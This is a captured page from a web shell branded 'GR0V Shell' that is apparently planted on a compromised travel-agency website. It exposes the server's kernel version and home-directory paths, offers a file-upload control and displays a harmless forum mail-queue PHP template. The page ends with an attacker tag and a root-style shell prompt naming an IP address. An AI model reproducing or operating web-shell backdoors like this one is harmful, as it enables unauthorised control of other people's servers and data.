? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/happyezystyle/board/Themes/default/
File Upload :
Current File : /home/admin/public_html/old/happyezystyle/board/Themes/default/ManageMail.template.php

<?php
// Version: 2.0 RC1; ManageMail

function template_browse()
{
	global $context, $settings, $options, $scripturl, $txt;

	echo '
	<table border="0" align="center" cellspacing="0" cellpadding="4" class="tborder" width="100%">
		<tr class="titlebg">
			<td colspan="2">', $txt['mailqueue_stats'], '</td>
		</tr>
		<tr class="windowbg">
			<td width="30%">', $txt['mailqueue_size'], ':</td>
			<td width="70%">', $context['mail_queue_size'], '</td>
		</tr>
		<tr class="windowbg">
			<td width="30%">', $txt['mailqueue_oldest'], ':</td>
			<td width="70%">', $context['oldest_mail'], '</td>
		</tr>
	</table>
	<br />';

	template_show_list('mail_queue');
}

?>

T1KUS90T
  root-grov@210.1.60.28:~$